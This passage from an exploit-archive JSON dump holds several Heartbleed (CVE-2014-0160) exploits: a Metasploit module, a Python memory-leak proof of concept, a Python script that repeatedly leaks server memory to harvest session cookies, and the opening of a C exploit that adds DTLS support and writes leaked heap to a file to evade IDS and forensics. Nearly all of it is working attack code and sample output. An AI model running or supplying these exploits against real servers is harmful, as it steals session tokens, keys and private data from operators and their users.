"published": "2014-04-10T00:00:00", "type": "zdt", "title": "OpenSSL Heartbeat (Heartbleed) Information Leak Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-10T00:00:00", "id": "1337DAY-ID-22129", "href": "https://0day.today/exploit/description/22129", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Auxiliary\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n include Msf::Auxiliary::Scanner\r\n include Msf::Auxiliary::Report\r\n\r\n CIPHER_SUITES = [\r\n 0xc014, # TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA\r\n 0xc00a, # TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA\r\n 0xc022, # TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA\r\n 0xc021, # TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA\r\n 0x0039, # TLS_DHE_RSA_WITH_AES_256_CBC_SHA\r\n 0x0038, # TLS_DHE_DSS_WITH_AES_256_CBC_SHA\r\n 0x0088, # TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA\r\n 0x0087, # TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA\r\n 0x0087, # TLS_ECDH_RSA_WITH_AES_256_CBC_SHA\r\n 0xc00f, # TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA\r\n 0x0035, # TLS_RSA_WITH_AES_256_CBC_SHA\r\n 0x0084, # TLS_RSA_WITH_CAMELLIA_256_CBC_SHA\r\n 0xc012, # TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0xc008, # TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA\r\n 0xc01c, # TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA\r\n 0xc01b, # TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0x0016, # TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0x0013, # TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA\r\n 0xc00d, # TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0xc003, # TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA\r\n 0x000a, # TLS_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0xc013, # TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA\r\n 0xc009, # TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA\r\n 0xc01f, # TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA\r\n 0xc01e, # TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA\r\n 0x0033, # TLS_DHE_RSA_WITH_AES_128_CBC_SHA\r\n 0x0032, # TLS_DHE_DSS_WITH_AES_128_CBC_SHA\r\n 0x009a, # TLS_DHE_RSA_WITH_SEED_CBC_SHA\r\n 0x0099, # TLS_DHE_DSS_WITH_SEED_CBC_SHA\r\n 0x0045, # TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA\r\n 0x0044, # TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA\r\n 0xc00e, # TLS_ECDH_RSA_WITH_AES_128_CBC_SHA\r\n 0xc004, # TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA\r\n 0x002f, # TLS_RSA_WITH_AES_128_CBC_SHA\r\n 0x0096, # TLS_RSA_WITH_SEED_CBC_SHA\r\n 0x0041, # TLS_RSA_WITH_CAMELLIA_128_CBC_SHA\r\n 0xc011, # TLS_ECDHE_RSA_WITH_RC4_128_SHA\r\n 0xc007, # TLS_ECDHE_ECDSA_WITH_RC4_128_SHA\r\n 0xc00c, # TLS_ECDH_RSA_WITH_RC4_128_SHA\r\n 0xc002, # TLS_ECDH_ECDSA_WITH_RC4_128_SHA\r\n 0x0005, # TLS_RSA_WITH_RC4_128_SHA\r\n 0x0004, # TLS_RSA_WITH_RC4_128_MD5\r\n 0x0015, # TLS_DHE_RSA_WITH_DES_CBC_SHA\r\n 0x0012, # TLS_DHE_DSS_WITH_DES_CBC_SHA\r\n 0x0009, # TLS_RSA_WITH_DES_CBC_SHA\r\n 0x0014, # TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA\r\n 0x0011, # TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA\r\n 0x0008, # TLS_RSA_EXPORT_WITH_DES40_CBC_SHA\r\n 0x0006, # TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5\r\n 0x0003, # TLS_RSA_EXPORT_WITH_RC4_40_MD5\r\n 0x00ff # Unknown\r\n ]\r\n\r\n HANDSHAKE_RECORD_TYPE = 0x16\r\n HEARTBEAT_RECORD_TYPE = 0x18\r\n ALERT_RECORD_TYPE = 0x15\r\n TLS_VERSION = {\r\n '1.0' => 0x0301,\r\n '1.1' => 0x0302,\r\n '1.2' => 0x0303\r\n }\r\n\r\n TTLS_CALLBACKS = {\r\n 'SMTP' => :tls_smtp,\r\n 'IMAP' => :tls_imap,\r\n 'JABBER' => :tls_jabber,\r\n 'POP3' => :tls_pop3\r\n }\r\n\r\n def initialize\r\n super(\r\n 'Name' => 'OpenSSL Heartbeat (Heartbleed) Information Leak',\r\n 'Description' => %q{\r\n This module implements the OpenSSL Heartbleed attack. The problem\r\n exists in the handling of heartbeat requests, where a fake length can\r\n be used to leak memory data in the response. Services that support\r\n STARTTLS may also be vulnerable.\r\n },\r\n 'Author' => [\r\n 'Neel Mehta', # Vulnerability discovery\r\n 'Riku', # Vulnerability discovery\r\n 'Antti', # Vulnerability discovery\r\n 'Matti', # Vulnerability discovery\r\n 'Jared Stafford <jspenguin[at]jspenguin.org>', # Original Proof of Concept. This module is based on it.\r\n 'FiloSottile', # PoC site and tool\r\n 'Christian Mehlmauer', # Msf module\r\n 'wvu', # Msf module\r\n 'juan vazquez' # Msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2014-0160'],\r\n ['US-CERT-VU', '720951'],\r\n ['URL', 'https://www.us-cert.gov/ncas/alerts/TA14-098A'],\r\n ['URL', 'http://heartbleed.com/'],\r\n ['URL', 'https://github.com/FiloSottile/Heartbleed'],\r\n ['URL', 'https://gist.github.com/takeshixx/10107280'],\r\n ['URL', 'http://filippo.io/Heartbleed/']\r\n ],\r\n 'DisclosureDate' => 'Apr 7 2014',\r\n 'License' => MSF_LICENSE\r\n )\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(443),\r\n OptEnum.new('STARTTLS', [true, 'Protocol to use with STARTTLS, None to avoid STARTTLS ', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3' ]]),\r\n OptEnum.new('TLSVERSION', [true, 'TLS version to use', '1.0', ['1.0', '1.1', '1.2']])\r\n ], self.class)\r\n\r\n register_advanced_options(\r\n [\r\n OptString.new('XMPPDOMAIN', [ true, 'The XMPP Domain to use when Jabber is selected', 'localhost' ])\r\n ], self.class)\r\n\r\n end\r\n\r\n def peer\r\n \"#{rhost}:#{rport}\"\r\n end\r\n\r\n def tls_smtp\r\n # https://tools.ietf.org/html/rfc3207\r\n sock.get_once\r\n sock.put(\"EHLO #{Rex::Text.rand_text_alpha(10)}\\n\")\r\n res = sock.get_once\r\n\r\n unless res && res =~ /STARTTLS/\r\n return nil\r\n end\r\n sock.put(\"STARTTLS\\n\")\r\n sock.get_once\r\n end\r\n\r\n def tls_imap\r\n # http://tools.ietf.org/html/rfc2595\r\n sock.get_once\r\n sock.put(\"a001 CAPABILITY\\r\\n\")\r\n res = sock.get_once\r\n unless res && res =~ /STARTTLS/i\r\n return nil\r\n end\r\n sock.put(\"a002 STARTTLS\\r\\n\")\r\n sock.get_once\r\n end\r\n\r\n def tls_pop3\r\n # http://tools.ietf.org/html/rfc2595\r\n sock.get_once\r\n sock.put(\"CAPA\\r\\n\")\r\n res = sock.get_once\r\n if res.nil? || res =~ /^-/ || res !~ /STLS/\r\n return nil\r\n end\r\n sock.put(\"STLS\\r\\n\")\r\n res = sock.get_once\r\n if res.nil? || res =~ /^-/\r\n return nil\r\n end\r\n res\r\n end\r\n\r\n def tls_jabber\r\n # http://xmpp.org/extensions/xep-0035.html\r\n msg = \"<?xml version='1.0' ?>\"\r\n msg << \"<stream:stream xmlns='jabber:client' \"\r\n msg << \"xmlns:stream='http://etherx.jabber.org/streams' \"\r\n msg << \"version='1.0' \"\r\n msg << \"to='#{datastore['XMPPDOMAIN']}'>\"\r\n sock.put(msg)\r\n res = sock.get\r\n if res.nil? || res =~ /stream:error/ || res !~ /starttls/i\r\n print_error(\"#{peer} - Jabber host unknown. Please try changing the XMPPDOMAIN option.\") if res && res =~ /<host-unknown/\r\n return nil\r\n end\r\n msg = \"<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\"\r\n sock.put(msg)\r\n sock.get_once\r\n end\r\n\r\n def run_host(ip)\r\n connect\r\n\r\n unless datastore['STARTTLS'] == 'None'\r\n vprint_status(\"#{peer} - Trying to start SSL via #{datastore['STARTTLS']}\")\r\n res = self.send(TTLS_CALLBACKS[datastore['STARTTLS']])\r\n if res.nil?\r\n vprint_error(\"#{peer} - STARTTLS failed...\")\r\n return\r\n end\r\n end\r\n\r\n vprint_status(\"#{peer} - Sending Client Hello...\")\r\n sock.put(client_hello)\r\n\r\n server_hello = sock.get\r\n unless server_hello.unpack(\"C\").first == HANDSHAKE_RECORD_TYPE\r\n vprint_error(\"#{peer} - Server Hello Not Found\")\r\n return\r\n end\r\n\r\n vprint_status(\"#{peer} - Sending Heartbeat...\")\r\n heartbeat_length = 16384\r\n sock.put(heartbeat(heartbeat_length))\r\n hdr = sock.get_once(5)\r\n if hdr.blank?\r\n vprint_error(\"#{peer} - No Heartbeat response...\")\r\n return\r\n end\r\n\r\n unpacked = hdr.unpack('Cnn')\r\n type = unpacked[0]\r\n version = unpacked[1] # must match the type from client_hello\r\n len = unpacked[2]\r\n\r\n # try to get the TLS error\r\n if type == ALERT_RECORD_TYPE\r\n res = sock.get_once(len)\r\n alert_unp = res.unpack('CC')\r\n alert_level = alert_unp[0]\r\n alert_desc = alert_unp[1]\r\n msg = \"Unknown error\"\r\n # http://tools.ietf.org/html/rfc5246#section-7.2\r\n case alert_desc\r\n when 0x46\r\n msg = \"Protocol error. Looks like the chosen protocol is not supported.\"\r\n end\r\n print_error(\"#{peer} - #{msg}\")\r\n disconnect\r\n return\r\n end\r\n\r\n unless type == HEARTBEAT_RECORD_TYPE && version == TLS_VERSION[datastore['TLSVERSION']]\r\n vprint_error(\"#{peer} - Unexpected Heartbeat response\")\r\n disconnect\r\n return\r\n end\r\n\r\n vprint_status(\"#{peer} - Heartbeat response, checking if there is data leaked...\")\r\n heartbeat_data = sock.get_once(heartbeat_length) # Read the magic length...\r\n if heartbeat_data\r\n print_good(\"#{peer} - Heartbeat response with leak\")\r\n report_vuln({\r\n :host => rhost,\r\n :port => rport,\r\n :name => self.name,\r\n :refs => self.references,\r\n :info => \"Module #{self.fullname} successfully leaked info\"\r\n })\r\n vprint_status(\"#{peer} - Printable info leaked: #{heartbeat_data.gsub(/[^[:print:]]/, '')}\")\r\n else\r\n vprint_error(\"#{peer} - Looks like there isn't leaked information...\")\r\n end\r\n end\r\n\r\n def heartbeat(length)\r\n payload = \"\\x01\" # Heartbeat Message Type: Request (1)\r\n payload << [length].pack(\"n\") # Payload Length: 16384\r\n\r\n ssl_record(HEARTBEAT_RECORD_TYPE, payload)\r\n end\r\n\r\n def client_hello\r\n # Use current day for TLS time\r\n time_temp = Time.now\r\n time_epoch = Time.mktime(time_temp.year, time_temp.month, time_temp.day, 0, 0).to_i\r\n\r\n hello_data = [TLS_VERSION[datastore['TLSVERSION']]].pack(\"n\") # Version TLS\r\n hello_data << [time_epoch].pack(\"N\") # Time in epoch format\r\n hello_data << Rex::Text.rand_text(28) # Random\r\n hello_data << \"\\x00\" # Session ID length\r\n hello_data << [CIPHER_SUITES.length * 2].pack(\"n\") # Cipher Suites length (102)\r\n hello_data << CIPHER_SUITES.pack(\"n*\") # Cipher Suites\r\n hello_data << \"\\x01\" # Compression methods length (1)\r\n hello_data << \"\\x00\" # Compression methods: null\r\n\r\n hello_data_extensions = \"\\x00\\x0f\" # Extension type (Heartbeat)\r\n hello_data_extensions << \"\\x00\\x01\" # Extension length\r\n hello_data_extensions << \"\\x01\" # Extension data\r\n\r\n hello_data << [hello_data_extensions.length].pack(\"n\")\r\n hello_data << hello_data_extensions\r\n\r\n data = \"\\x01\\x00\" # Handshake Type: Client Hello (1)\r\n data << [hello_data.length].pack(\"n\") # Length\r\n data << hello_data\r\n\r\n ssl_record(HANDSHAKE_RECORD_TYPE, data)\r\n end\r\n\r\n def ssl_record(type, data)\r\n record = [type, TLS_VERSION[datastore['TLSVERSION']], data.length].pack('Cnn')\r\n record << data\r\n end\r\nend\n\n# 0day.today [2018-01-03] #", "sourceHref": "https://0day.today/exploit/22129", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-03T01:40:21", "description": "Exploit for multiple platform in category remote exploits", "cvss3": {}, "published": "2014-04-09T00:00:00", "type": "zdt", "title": "OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "1337DAY-ID-22122", "href": "https://0day.today/exploit/description/22122", "sourceData": "# Exploit Title: [OpenSSL TLS Heartbeat Extension - Memory Disclosure - Multiple SSL/TLS versions]\r\n# Date: [2014-04-09]\r\n# Exploit Author: [Csaba Fitzl]\r\n# Vendor Homepage: [http://www.openssl.org/]\r\n# Software Link: [http://www.openssl.org/source/openssl-1.0.1f.tar.gz]\r\n# Version: [1.0.1f]\r\n# Tested on: [N/A]\r\n# CVE : [2014-0160]\r\n \r\n \r\n#!/usr/bin/env python\r\n \r\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email\u00a0protected])\r\n# The author disclaims copyright to this source code.\r\n# Modified by Csaba Fitzl for multiple SSL / TLS version support\r\n \r\nimport sys\r\nimport struct\r\nimport socket\r\nimport time\r\nimport select\r\nimport re\r\nfrom optparse import OptionParser\r\n \r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\n \r\ndef h2bin(x):\r\n return x.replace(' ', '').replace('\\n', '').decode('hex')\r\n \r\nversion = []\r\nversion.append(['SSL 3.0','03 00'])\r\nversion.append(['TLS 1.0','03 01'])\r\nversion.append(['TLS 1.1','03 02'])\r\nversion.append(['TLS 1.2','03 03'])\r\n \r\ndef create_hello(version):\r\n hello = h2bin('16 ' + version + ' 00 dc 01 00 00 d8 ' + version + ''' 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01\r\n''')\r\n return hello\r\n \r\ndef create_hb(version):\r\n hb = h2bin('18 ' + version + ' 00 03 01 40 00')\r\n return hb\r\n \r\ndef hexdump(s):\r\n for b in xrange(0, len(s), 16):\r\n lin = [c for c in s[b : b + 16]]\r\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\r\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\r\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n print\r\n \r\ndef recvall(s, length, timeout=5):\r\n endtime = time.time() + timeout\r\n rdata = ''\r\n remain = length\r\n while remain > 0:\r\n rtime = endtime - time.time()\r\n if rtime < 0:\r\n return None\r\n r, w, e = select.select([s], [], [], 5)\r\n if s in r:\r\n data = s.recv(remain)\r\n # EOF?\r\n if not data:\r\n return None\r\n rdata += data\r\n remain -= len(data)\r\n return rdata\r\n \r\n \r\ndef recvmsg(s):\r\n hdr = recvall(s, 5)\r\n if hdr is None:\r\n print 'Unexpected EOF receiving record header - server closed connection'\r\n return None, None, None\r\n typ, ver, ln = struct.unpack('>BHH', hdr)\r\n pay = recvall(s, ln, 10)\r\n if pay is None:\r\n print 'Unexpected EOF receiving record payload - server closed connection'\r\n return None, None, None\r\n print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n return typ, ver, pay\r\n \r\ndef hit_hb(s,hb):\r\n s.send(hb)\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ is None:\r\n print 'No heartbeat response received, server likely not vulnerable'\r\n return False\r\n \r\n if typ == 24:\r\n print 'Received heartbeat response:'\r\n hexdump(pay)\r\n if len(pay) > 3:\r\n print 'WARNING: server returned more data than it should - server is vulnerable!'\r\n else:\r\n print 'Server processed malformed heartbeat, but did not return any extra data.'\r\n return True\r\n \r\n if typ == 21:\r\n print 'Received alert:'\r\n hexdump(pay)\r\n print 'Server returned error, likely not vulnerable'\r\n return False\r\n \r\ndef main():\r\n opts, args = options.parse_args()\r\n if len(args) < 1:\r\n options.print_help()\r\n return\r\n for i in range(len(version)):\r\n print 'Trying ' + version[i][0] + '...'\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n print 'Connecting...'\r\n sys.stdout.flush()\r\n s.connect((args[0], opts.port))\r\n print 'Sending Client Hello...'\r\n sys.stdout.flush()\r\n s.send(create_hello(version[i][1]))\r\n print 'Waiting for Server Hello...'\r\n sys.stdout.flush()\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ == None:\r\n print 'Server closed connection without sending Server Hello.'\r\n return\r\n # Look for server hello done message.\r\n if typ == 22 and ord(pay[0]) == 0x0E:\r\n break\r\n \r\n print 'Sending heartbeat request...'\r\n sys.stdout.flush()\r\n s.send(create_hb(version[i][1]))\r\n if hit_hb(s,create_hb(version[i][1])):\r\n #Stop if vulnerable\r\n break\r\n \r\nif __name__ == '__main__':\r\n main()\n\n# 0day.today [2018-03-02] #", "sourceHref": "https://0day.today/exploit/22122", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-14T02:43:51", "description": "This python script is a modification of the heartbleed proof of concept exploit that looks for cookies, specifically user sessions.", "cvss3": {}, "published": "2014-04-09T00:00:00", "type": "zdt", "title": "Heartbleed User Session Extraction Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "1337DAY-ID-22118", "href": "https://0day.today/exploit/description/22118", "sourceData": "#!/usr/bin/python\r\n\r\n# Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions.\r\n# Michael Davis ([email\u00a0protected])\r\n\r\n# Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email\u00a0protected])\r\n\r\n# The author disclaims copyright to this source code.\r\n\r\nimport select\r\nimport sys\r\nimport string\r\nimport struct\r\nimport socket\r\nimport time\r\nfrom optparse import OptionParser\r\n\r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\noptions.add_option('-c', '--cookie', type='str', default='session', help='Cookie to look for. (default: session)')\r\n\r\n\r\ndef h2bin(x):\r\n return x.replace(' ', '').replace('\\n', '').decode('hex')\r\n\r\nhello = h2bin('''\r\n16 03 02 00 dc 01 00 00 d8 03 02 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01\r\n''')\r\n\r\nhb = h2bin('''\r\n18 03 02 00 03\r\n01 40 00\r\n''')\r\n\r\n\r\nclass HeartBleeder(object):\r\n\r\n server_response = None\r\n socket = None\r\n hostname = ''\r\n port = 443\r\n found_sessions = set()\r\n cookie = 'session'\r\n cookie_length = 56\r\n\r\n def __init__(self, hostname='', cookie=''):\r\n self.hostname = hostname\r\n self.cookie = cookie\r\n\r\n def connect(self):\r\n \"\"\"\r\n Connects to the remote server.\r\n \"\"\"\r\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sys.stdout.flush()\r\n self.socket.connect((self.hostname, self.port))\r\n sys.stdout.flush()\r\n self.socket.send(hello)\r\n sys.stdout.flush()\r\n\r\n def rcv_response(self):\r\n while True:\r\n _type, version, payload = self.rcv_message()\r\n if _type is None:\r\n print 'Server closed connection without sending Server Hello.'\r\n return\r\n # Look for server hello done message.\r\n if _type == 22 and ord(payload[0]) == 0x0E:\r\n break\r\n\r\n def rcv_message(self):\r\n\r\n record_header = self.rcv_all(5)\r\n if record_header is None:\r\n print 'Unexpected EOF receiving record header - server closed connection'\r\n return None, None, None\r\n _type, version, line = struct.unpack('>BHH', record_header)\r\n payload = self.rcv_all(line, 10)\r\n if payload is None:\r\n print 'Unexpected EOF receiving record payload - server closed connection'\r\n return None, None, None\r\n # print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n return _type, version, payload\r\n\r\n def rcv_all(self, length, timeout=5):\r\n endtime = time.time() + timeout\r\n rdata = ''\r\n remain = length\r\n while remain > 0:\r\n rtime = endtime - time.time()\r\n if rtime < 0:\r\n return None\r\n r, w, e = select.select([self.socket], [], [], 5)\r\n if self.socket in r:\r\n data = self.socket.recv(remain)\r\n # EOF?\r\n if not data:\r\n return None\r\n rdata += data\r\n remain -= len(data)\r\n return rdata\r\n\r\n def try_heartbeat(self):\r\n self.socket.send(hb)\r\n while True:\r\n _type, version, self.payload = self.rcv_message()\r\n if _type is None:\r\n print 'No heartbeat response received, server likely not vulnerable'\r\n return False\r\n\r\n if _type == 24:\r\n # print 'Received heartbeat response:'\r\n self.parse_response()\r\n if len(self.payload) > 3:\r\n pass\r\n # print 'WARNING: server returned more data than it should - server is vulnerable!'\r\n else:\r\n print 'Server processed malformed heartbeat, but did not return any extra data.'\r\n return True\r\n\r\n if _type == 21:\r\n print 'Received alert:'\r\n self.hexdump(self.payload)\r\n print 'Server returned error, likely not vulnerable'\r\n return False\r\n\r\n def parse_response(self):\r\n \"\"\"\r\n Parses the response from the server for a session id.\r\n \"\"\"\r\n ascii = ''.join((c if 32 <= ord(c) <= 126 else ' ')for c in self.payload)\r\n index = string.find(ascii, self.cookie)\r\n if index >= 0:\r\n info = ascii[index:index + self.cookie_length]\r\n session = info.split(' ')[0]\r\n session = string.replace(session, ';', '')\r\n if session not in self.found_sessions:\r\n self.found_sessions.add(session)\r\n print session\r\n\r\n def hexdump(self, payload):\r\n \"\"\"\r\n Prints out a hexdump in the event that server returns an error.\r\n \"\"\"\r\n for b in xrange(0, len(payload), 16):\r\n line = [c for c in payload[b:b + 16]]\r\n hxdat = ' '.join('%02X' % ord(c) for c in line)\r\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in line)\r\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n print\r\n\r\n def scan(self):\r\n self.connect()\r\n self.rcv_response()\r\n self.try_heartbeat()\r\n\r\n\r\ndef main():\r\n opts, args = options.parse_args()\r\n if len(args) < 1:\r\n options.print_help()\r\n return\r\n\r\n cookies_str = 'session'\r\n if len(args) > 1:\r\n cookies_str = args[1]\r\n\r\n print cookies_str\r\n\r\n while True:\r\n heartbeat = HeartBleeder(hostname=args[0], cookie=cookies_str)\r\n heartbeat.scan()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\n\n# 0day.today [2018-03-14] #", "sourceHref": "https://0day.today/exploit/22118", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-13T03:43:15", "description": "This exploit uses OpenSSL to create an encrypted connection and trigger the heartbleed leak. The leaked information is returned within encrypted SSL packets and is then decrypted and wrote to a file to annoy IDS/forensics. The exploit can set heartbeat payload length arbitrarily or use two preset values for NULL and MAX length.", "cvss3": {}, "published": "2014-04-24T00:00:00", "type": "zdt", "title": "Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-24T00:00:00", "id": "1337DAY-ID-22172", "href": "https://0day.today/exploit/description/22172", "sourceData": "/*\r\n* CVE-2014-0160 heartbleed OpenSSL information leak exploit\r\n* =========================================================\r\n* This exploit uses OpenSSL to create an encrypted connection\r\n* and trigger the heartbleed leak. The leaked information is\r\n* returned within encrypted SSL packets and is then decrypted\r\n* and wrote to a file to annoy IDS/forensics. The exploit can\r\n* set heartbeat payload length arbitrarily or use two preset\r\n* values for NULL and MAX length. The vulnerability occurs due\r\n* to bounds checking not being performed on a heap value which\r\n* is user supplied and returned to the user as part of DTLS/TLS\r\n* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to\r\n* 1.0.1f are known affected. You must run this against a target\r\n* which is linked to a vulnerable OpenSSL library using DTLS/TLS.\r\n* This exploit leaks upto 65532 bytes of remote heap each request\r\n* and can be run in a loop until the connected peer ends connection.\r\n* The data leaked contains 16 bytes of random padding at the end.\r\n* The exploit can be used against a connecting client or server,\r\n* it can also send pre_cmd's to plain-text services to establish\r\n* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients\r\n* will often forcefully close the connection during large leak\r\n* requests so try to lower your payload request size.\r\n*\r\n* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g\r\n*\r\n* E.g.\r\n* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed\r\n* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ connecting to 192.168.11.23 443/tcp\r\n* [ connected to 192.168.11.23 443/tcp\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=65535\r\n* [ final record type=24, length=16384\r\n* [ wrote 16381 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=42\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=18\r\n* [ wrote 18 bytes of heap to file 'out'\r\n* [ done.\r\n* $ ls -al out\r\n* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out\r\n* $ hexdump -C out\r\n* - snip - snip \r\n*\r\n* Use following example command to generate certificates for clients.\r\n*\r\n* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\r\n* -keyout server.key -out server.crt\r\n*\r\n* Debian compile with \"gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\r\n* -lssl -Wl,-Bdynamic -lssl3 -lcrypto\"\r\n*\r\n* todo: add udp/dtls support.\r\n*\r\n* - Hacker Fantastic\r\n* http://www.mdsec.co.uk\r\n*\r\n*/\r\n \r\n/* Modified by Ayman Sagy aymansagy @ gmail.com - Added DTLS over UDP support\r\n*\r\n* use -u switch, tested against s_server/s_client version 1.0.1d\r\n*\r\n* # openssl s_server -accept 990 -cert ssl.crt -key ssl.key -dtls1\r\n* ...\r\n* # ./heartbleed -s 192.168.75.235 -p 990 -f eshta -t 1 -u\r\n* [ 